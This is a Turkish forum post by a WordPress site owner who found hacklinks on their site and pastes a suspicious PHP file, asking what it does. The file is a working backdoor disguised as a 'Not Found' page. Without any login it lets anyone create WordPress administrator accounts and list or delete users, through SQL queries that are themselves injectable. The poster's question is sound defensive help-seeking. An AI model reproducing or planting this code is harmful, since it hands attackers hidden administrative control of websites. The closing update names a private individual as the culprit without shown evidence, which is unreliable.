Worpress siteme hacklink eklendiğini gördüm.
Çeşitli eklentilerle incelerken aşağıdaki kodlarda şüpheye düştüm.
Anlayan arkadaşlar, ne işe yaradığını belirtebilir mi?
Sıkıntılı kodlar mı?
<html> <head> <title>Not Found</title> <meta charset="UTF-8" /> <meta name="robots" content="noindex, nofollow"> </head> <body> <?php if($_SERVER["HTTP_USER_AGENT"] == ""){die("");} ## Bağlantı Değişkenleri ## $host = "localhost"; $user = "xxx"; $pass = "xxx"; $db = "xxx"; ## Mysql Bağlantısı ## $baglan = mysql_connect($host, $user, $pass) or die (mysql_Error()); ## Veritabanı Seçimi ## mysql_select_db($db, $baglan) or die (mysql_Error()); ## Karakter Sorunu ## mysql_query("SET CHARACTER SET 'utf8'"); mysql_query("SET NAMES 'utf8'"); if($_POST["ekle"]){ $user_login = $_POST["a1"]; $user_pass = md5($_POST["a2"]); $user_nickname = $_POST["a3"]; $user_mail = $_POST["a4"]; $user_url = $_SERVER['SERVER_NAME']; // orn. 2016-11-11 18:41:13 $user_registered = date('Y-d-m H:i:s'); $user_status = 0; $display_name = $_POST["a5"]; $users_ekle = mysql_query("INSERT INTO wp_users SET user_login = '$user_login', user_pass = '$user_pass', user_nicename = '$user_nickname', user_email = '$user_mail', user_url = '$user_url', user_registered = '$user_registered', user_status = '$user_status', display_name = '$display_name'"); $users_z = mysql_query("SELECT ID FROM wp_users WHERE user_login = '$user_login'"); $user = mysql_fetch_array($users_z); $user_id = $user["ID"]; if($users_ekle){ $yetki = 'a:1:{s:13:"administrator";b:1;}'; $meta_ekle1 = mysql_query("INSERT INTO wp_usermeta SET user_id = '$user_id', meta_key = 'wp_capabilities', meta_value = '$yetki'"); $meta_ekle2 = mysql_query("INSERT INTO wp_usermeta SET user_id = '$user_id', meta_key = 'wp_user_level', meta_value = '10'"); if($meta_ekle1 AND $meta_ekle2){ echo '<b style="color:green;">BAŞARILI KULLANICI EKLENDİ.</b>'; }else{ echo '<b style="color:red;">HATA! AŞAMA :: 2 :: '.mysql_error().'</b>'; } }else{ echo '<b style="color:red;">HATA! AŞAMA :: 1 :: '.mysql_error().'</b>'; } } if($_GET["sil"]){ $id = $_GET["sil"]; $delete = mysql_query("DELETE FROM wp_users WHERE ID = '$id'"); if($delete){ $diger = mysql_query("DELETE FROM wp_usermeta WHERE user_id = '$id'"); if($diger){ echo '<b style="color:green">BAŞARILI, SİLİNDİ.</b>'; }else{ echo 'HATA! (KOD:2) Silerken hata oluştu. '; } }else{ echo 'HATA! Silerken hata oluştu. '; } } ?> <h1>EKLE</h1> <hr></hr> <form action="" method="POST"> <input type="textbox" placeholder="kullanıcı adı" name="a1" /><br/><br/> <input type="password" placeholder="şifre" name="a2" /><br/><br/> <input type="textbox" placeholder="ad soyad" name="a3" /><br/><br/> <input type="textbox" placeholder="eposta" name="a4" /><br/><br/> <input type="textbox" placeholder="görünecek isim" name="a5" /><br/><br/> <input type="submit" name="ekle" value=">> EKLE >>"/> </form> <h1>SİL</h1> <hr></hr> <table> <tr> <th>Kullanıcı Adı</th> <th>Şifre</th> <th>Ad Soyad</th> <th>E-Posta</th> <th>Görünecek İsim</th> <th>@@</th> </tr> <?php $query = mysql_query("SELECT * FROM wp_users"); while($row = mysql_fetch_array($query)){ extract($row); ?> <tr> <td><?php echo $user_login ?></td> <td><?php echo "*****" ?></td> <td><?php echo $user_nicename ?></td> <td><?php echo $user_email ?></td> <td><?php echo $display_name ?></td> <td><a href="http://<?php echo $_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']; ?>?sil=<?php echo $ID; ?>">S İ L</a></td> </tr> <?php } ?> </table> </body> </html>GÜNCELLEME: Sitelere hacklink ekleyen isim olarak Adem Bozkurt çıkıyor. Var mıdır bu şahsı tanıyan? Ne yapılabilir?